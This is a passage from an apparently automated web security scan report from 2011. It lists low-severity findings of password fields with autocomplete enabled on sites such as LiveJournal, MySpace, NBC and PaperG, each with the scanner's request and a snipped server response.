Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:14 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 15747


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/saugi-joomla.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

15.161. http://www.livejournal.com/update.bml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.livejournal.com
Path:   /update.bml

Issue detail

The page contains a form with the following action URL:
  • http://www.livejournal.com/update.bml
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /update.bml HTTP/1.1
Host: www.livejournal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 04:43:03 GMT
Server: Apache/2.2.3 (CentOS)
X-AWS-Id: ws33
Set-Cookie: ljuniq=qSLA0OACBpHpEQx:1295930583:pgstats0:m0; expires=Saturday, 26-Mar-2011 04:43:03 GMT; domain=.livejournal.com; path=/
X-XSS-Protection: 0
Cache-Control: private, proxy-revalidate
ETag: "0d1717ff7e20cf2aa2b1705c6fb92344"
Content-length: 48142
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<
...[SNIP]...
<td>

<form method='post' action='update.bml' id='updateForm' name='updateForm'>

<input type='hidden' name="lj_form_auth" value="c0:1295928000:2583:86400:DlmOeXnxss-0-qSLA0OACBpHpEQx:c0046ca7a6b3fea22aa5ddf3a408ecca" />
...[SNIP]...
</label>
<input type="password" maxlength="30" tabindex="6" name="password" class="text" id="altlogin_password" size="15" />
</p>
...[SNIP]...

15.162. http://www.livejournal.com/update.bml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.livejournal.com
Path:   /update.bml

Issue detail

The page contains a form with the following action URL:
  • https://www.livejournal.com/login.bml?ret=1
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /update.bml HTTP/1.1
Host: www.livejournal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 04:43:03 GMT
Server: Apache/2.2.3 (CentOS)
X-AWS-Id: ws33
Set-Cookie: ljuniq=qSLA0OACBpHpEQx:1295930583:pgstats0:m0; expires=Saturday, 26-Mar-2011 04:43:03 GMT; domain=.livejournal.com; path=/
X-XSS-Protection: 0
Cache-Control: private, proxy-revalidate
ETag: "0d1717ff7e20cf2aa2b1705c6fb92344"
Content-length: 48142
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<
...[SNIP]...
<div class="lj_loginform" id="Login">
<form style='margin: 0; padding: 0;' method="post" action="https://www.livejournal.com/login.bml?ret=1" id="login" class="lj_login_form">

<input type='hidden' name='mode' value='login' />
...[SNIP]...
<td style='white-space: nowrap;'><input type="password" name="password" size="15" class="lj_login_password" tabindex="2" />
<input type='submit' value="Log in" tabindex='3' />
...[SNIP]...

15.163. http://www.myspace.com/netlingo

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.myspace.com
Path:   /netlingo

Issue detail

The page contains a form with the following action URL:
  • https://www.myspace.com/auth/login
The form contains the following password field with autocomplete enabled:
  • Password

Request

GET /netlingo HTTP/1.1
Host: www.myspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-Server: 53fa252345a87b39ff47aafb4ed7b2849b482ff947909977
Set-Cookie: MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634314988124700820&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; domain=.myspace.com; expires=Tue, 01-Feb-2011 04:46:52 GMT; path=/
Set-Cookie: SessionDDF2=IHTN/IBoYERycvsTA4ECVPeqWgVgcluvK1Z4IiOTaL2hfgaqs8vsgeImvs/aMpMVsmPVoHOAflPeo6+ygc0HVA==; domain=.myspace.com; expires=Sat, 25-Jan-2031 04:46:52 GMT; path=/
X-AspNet-Version: 4.0.30319
X-PoweredBy: Chunk from Goonies
Date: Tue, 25 Jan 2011 04:46:51 GMT
Content-Length: 29349
X-Vertical: profileidentities


<!DOCTYPE html>
<html class="noJS en-US">
   <!-- UserViewProfile -->
<head><meta http-equiv="X-UA-Compatible" content="IE=7" />
<title>
   NetLingo on Myspace
</title>
       <script type="text/ja
...[SNIP]...
</div>
   

<form action="https://www.myspace.com/auth/login" method="post" class="signin trayForm">
<fieldset>
...[SNIP]...
</label>
<input type="password" id="passwordTray" class="passwordInput" name="Password" /></p>
...[SNIP]...

15.164. http://www.nbc.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nbc.com
Path:   /

Issue detail

The page contains a form with the following action URL:
  • http://www.nbc.com/
The form contains the following password field with autocomplete enabled:
  • password

Request

GET / HTTP/1.1
Host: www.nbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.10
Wirt: qw-p-web17.qwplatform.com
Content-Type: text/html
Cache-Control: max-age=40
Expires: Tue, 25 Jan 2011 04:47:46 GMT
Date: Tue, 25 Jan 2011 04:47:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak-mobile-true=no; expires=Wed, 26-Jan-2011 04:47:06 GMT; path=/
Vary: User-Agent
Content-Length: 131845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<
...[SNIP]...
<div id="mynbcLoginForm">
                   <form action="#" method="post">
                   <input type="text" name="email" value="email" title="email" tabindex="1" id="globalLoginEmail"/>
                       <input type="password" class="no-margin" name="password" value="password" title="password" tabindex="2" id="globalLoginPass"/>

                       <a id="globalLoginSubmitBtn" href="javascript:void(0);" title="Submit" tabindex="3">
...[SNIP]...

15.165. http://www.netlingo.com/login.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /login.php

Issue detail

The page contains a form with the following action URL:
  • http://www.netlingo.com/login-action.php
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /login.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=p2kggg0b9m3bnq9c57hhsvlcl0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 33956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<div id="form" class="left">
<form name="login" id="login" action="login-action.php" method="post">
                                <span class="label">
...[SNIP]...
</span> <input type="password" name="password" id="password" class="inputBoxLarge" /><br />
...[SNIP]...

15.166. http://www.netlingo.com/register-premium.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /register-premium.php

Issue detail

The page contains a form with the following action URL:
  • http://www.netlingo.com/register-premium.php
The form contains the following password fields with autocomplete enabled:
  • password
  • password2

Request

GET /register-premium.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 56600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<div id="form" class="left">    
<form name="register" id="register" onSubmit="return false;" method="post">
<span class="label">
...[SNIP]...
</span> <input type="password" name="password" id="password" class="inputBoxLarge" /><br />
...[SNIP]...
</span> <input type="password" name="password2" id="password2" class="inputBoxLarge" /><br />
...[SNIP]...

15.167. http://www.netlingo.com/register.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /register.php

Issue detail

The page contains a form with the following action URL:
  • http://www.netlingo.com/register.php
The form contains the following password fields with autocomplete enabled:
  • password
  • password2

Request

GET /register.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=sb796kqmjk5b811eau65ljq195; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 46577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<div id="form" class="left">    
<form name="register" id="register" onsubmit="return false;" method="post">
<span class="label">
...[SNIP]...
</span> <input type="password" name="password" id="password" class="inputBoxLarge" /><br />
...[SNIP]...
</span> <input type="password" name="password2" id="password2" class="inputBoxLarge" /><br />
...[SNIP]...

15.168. http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.networkworld.com
Path:   /news/2010/100710-ebay-deploys-joomla-for-analytics.html

Issue detail

The page contains a form with the following action URL:
  • http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html
The form contains the following password field with autocomplete enabled:
  • upass

Request

GET /news/2010/100710-ebay-deploys-joomla-for-analytics.html HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=300
Date: Tue, 25 Jan 2011 05:03:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<div id="login" name="login" method="post" action="/community/rtn_login08.php">
<form id="form_login">
<fieldset>
...[SNIP]...
<td>
<input name="upass" type="password" id="jq_password" class="inputtext" />
</td>
...[SNIP]...

15.169. http://www.noreastermagazine.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.noreastermagazine.com
Path:   /

Issue detail

The page contains a form with the following action URL:
  • http://www.noreastermagazine.com/index.php
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET / HTTP/1.1
Host: www.noreastermagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: 7f17775ebaca27b049989f22de967fcd=8770a74d6eac2afa63076869bfca0779; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 00:08:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 5572
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...
</p>
       <form action="index.php" method="post" name="login" id="form-login">
   <fieldset class="input">
...[SNIP]...
<br />
           <input type="password" name="passwd" class="inputbox" size="18" alt="Password" id="passwd" />
       </p>
...[SNIP]...

15.170. http://www.paperg.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /

Issue detail

The page contains a form with the following action URL:
  • http://www.paperg.com/
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET / HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1a2a1fi9q2vop26mnuph8otr37;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:04:37 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Vary: Accept-Encoding
Content-Type: text/html
Connection: close
Via: 1.1 AN-0016020122637050
Content-Length: 10755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<fieldset id="fb_login_field">
    <form id="form_login" action="" method="post">
       <input type="hidden" name="ppg" value="1" />
...[SNIP]...
</label>
    <input class="text" id="pass" name="pass" type="password" />
    <br />
...[SNIP]...

15.171. https://www.paperg.com/post.php

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.paperg.com
Path:   /post.php

Issue detail

The page contains a form with the following action URL:
  • https://www.paperg.com/process.php
The form contains the following password fields with autocomplete enabled:
  • login_password
  • account_password
  • account_confirm_password

Request

GET /post.php HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1a2a1fi9q2vop26mnuph8otr37;

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 05:04:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
   <head>
       <title>PaperG | Post a Flyer</title>
       
       <meta http-equiv="Content-Type" co
...[SNIP]...
</script>
                       
               
                                                                           <form name="campaign_form" enctype="multipart/form-data" action="process.php" method="POST" onsubmit="onFormSubmit();">
                   <input type="hidden" name="owner_id" value="0">
...[SNIP]...
<td>
                               <input type="password" name="login_password" id="login_password" onkeydown="on_login_enter(event);" onchange="saveInput(this.getAttribute( 'name' ));"/>
                               <span id="msg_login_password">
...[SNIP]...
<td>
                               <input maxlength=30 name="account_password" type="password" onchange="saveInput(this.getAttribute( 'name' ));" />
                               <br />
...[SNIP]...
<td>
                               <input maxlength=30 name="account_confirm_password" type="password" />
                               <span id="msg_account_confirm_password">
...[SNIP]...

15.172. https://www.paperg.com/post.php

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.paperg.com
Path:   /post.php

Issue detail

The page contains a form with the following action URL:
  • https://www.paperg.com/login.php
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /post.php HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1a2a1fi9q2vop26mnuph8otr37;

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 05:04:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
   <head>
       <title>PaperG | Post a Flyer</title>
       
       <meta http-equiv="Content-Type" co
...[SNIP]...
<div id="login">
   <form id="client-login" action="login.php" method="post">
   <input class="text" name="email" type="text" value="email" onclick="clickclear(this, 'email')" onblur="clickrecall(this,'email')" />
   <input class="text" name="pass" type="password" value="password" onclick="clickclear(this, 'password')" onblur="clickrecall(this,'password')" />
           <input type="image" src="images/rightarrow.png" class="button" />
...[SNIP]...

15.173. http://www.playshakespeare.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.playshakespeare.com
Path:   /

Issue detail

The page contains a form with the following action URL:
  • http://www.playshakespeare.com/index.php
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET / HTTP/1.1
Host: www.playshakespeare.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:11 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: eab80364d83027bfc601e73262603d25=341187f485832c9a1355235ffc880801; path=/
Last-Modified: Mon, 24 Jan 2011 15:15:14 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 180908

<?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns=
...[SNIP]...
<div id="form-login-area">
                               <form action="/index.php" method="post" name="login" id="form-login" >
                               <fieldset class="input">
...[SNIP]...
<br />
                   <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
               </p>
...[SNIP]...

15.174. http://www.regattaregatta.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.regattaregatta.com
Path:   /

Issue detail

The page contains a form with the following action URL:
  • http://www.regattaregatta.com/index.php/component/user/?task=login
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET / HTTP/1.1
Host: www.regattaregatta.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:28:38 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: 9d1da0e50aa9b6d723bb7d2254c4deb6=e77aa027edf65e1c9fc004520497c394; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: currentURI=http%3A%2F%2Fwww.regattaregatta.com%2Findex.php; expires=Wed, 26-Jan-2011 02:28:38 GMT; path=/
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 02:28:38 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<div class="hellomid">
               <form action="/index.php/component/user/?task=login" method="post" name="form-login" id="form-login" >
                                       <fieldset class="input">
...[SNIP]...
<br />
                           <input type="password" name="passwd" id="passwd" class="inputbox" size="18" alt="password" />
                       </label>
...[SNIP]...

15.175. http://www.rockettheme.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.rockettheme.com
Path:   /

Issue detail

The page contains a form with the following action URL:
  • http://www.rockettheme.com/index.php
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET / HTTP/1.1
Host: www.rockettheme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:10 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: cd6974ce18b02e32626c9ea04659f148=eec83c2a8abb5457a4ec33e10c194c24; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 16:01:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>

...[SNIP]...
<div id="rokclub-login" class="login">
<form action="/index.php" method="post" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

15.176. http://www.shape.com/workouts/articles/blood_sugar.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.shape.com
Path:   /workouts/articles/blood_sugar.html

Issue detail

The page contains a form with the following action URL:
  • http://www.shape.com/kickapps/public/ajax-login
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /workouts/articles/blood_sugar.html HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 25 Jan 2011 02:28:50 GMT
Server: Apache
Cache-Control: max-age=900
Location: http://www.shape.com/workouts/articles/blood-sugar.html
X-Server-Name: (null)
ETag: "1295922530"
Last-Modified: Tue, 25 Jan 2011 02:28:50 +0000
X-Powered-By: PHP/5.2.13
Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 02:43:49 GMT
Content-Type: text/html; charset=utf-8
Age: 0
Via: 1.1 mdw107101 (MII-APC/1.6)
Connection: close
Content-Length: 27234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com"
...[SNIP]...
<div class="upper_login_not_logged" style="display: none;">
<form action="/kickapps/public/ajax-login" method="POST">
<table border="0">
...[SNIP]...
<input type="text" value="Password" name="password-clear" /><input style="display: none;" type="password" name="password" /></div>
...[SNIP]...

15.177. http://www.shape.com/workouts/articles/workout_schedule.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.shape.com
Path:   /workouts/articles/workout_schedule.html

Issue detail

The page contains a form with the following action URL:
  • http://www.shape.com/kickapps/public/ajax-login
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /workouts/articles/workout_schedule.html HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 25 Jan 2011 02:28:49 GMT
Server: Apache
Cache-Control: max-age=900
Location: http://www.shape.com/workouts/articles/workout-schedule.html
X-Server-Name: (null)
ETag: "1295922529"
Last-Modified: Tue, 25 Jan 2011 02:28:49 +0000
X-Powered-By: PHP/5.2.13
Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 02:43:49 GMT
Content-Type: text/html; charset=utf-8
Age: 0
Via: 1.1 mdw107101 (MII-APC/1.6)
Connection: close
Content-Length: 27239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com"
...[SNIP]...
<div class="upper_login_not_logged" style="display: none;">
<form action="/kickapps/public/ajax-login" method="POST">
<table border="0">
...[SNIP]...
<input type="text" value="Password" name="password-clear" /><input style="display: none;" type="password" name="password" /></div>
...[SNIP]...

15.178. http://www.svenskjoomla.se/index.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.svenskjoomla.se
Path:   /index.php

Issue detail

The page contains a form with the following action URL:
  • http://www.svenskjoomla.se/index.php?option=com_comprofiler&task=login
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET /index.php HTTP/1.1
Host: www.svenskjoomla.se
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:15 GMT
Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7e-p1 PHP/5.2.4 with Suhosin-Patch
X-Powered-By: PHP/5.2.4
Set-Cookie: c785f5238e48c40198c070b75c5431da=-; path=/
Set-Cookie: mosvisitor=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 16:01:15 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 19582

<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/199
...[SNIP]...
<td>
               <form action="http://www.svenskjoomla.se/index.php?option=com_comprofiler&amp;task=login" method="post" id="mod_loginform">
Du beh.ver inte registrera dig f.r att ladda ner spr.kfiler.<br />
...[SNIP]...
<br /><input type="password" name="passwd" class="inputbox" size="10" /><br />
...[SNIP]...

15.179. http://www.thefeast.com/boston/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.thefeast.com
Path:   /boston/

Issue detail

The page contains a form with the following action URL:
  • http://www.thefeast.com/i/dispatcher/?h=feastuser
The form contains the following password field with autocomplete enabled:
  • loginPassword

Request

GET /boston/ HTTP/1.1
Host: www.thefeast.com
Accept: */*
Accept-Language: en
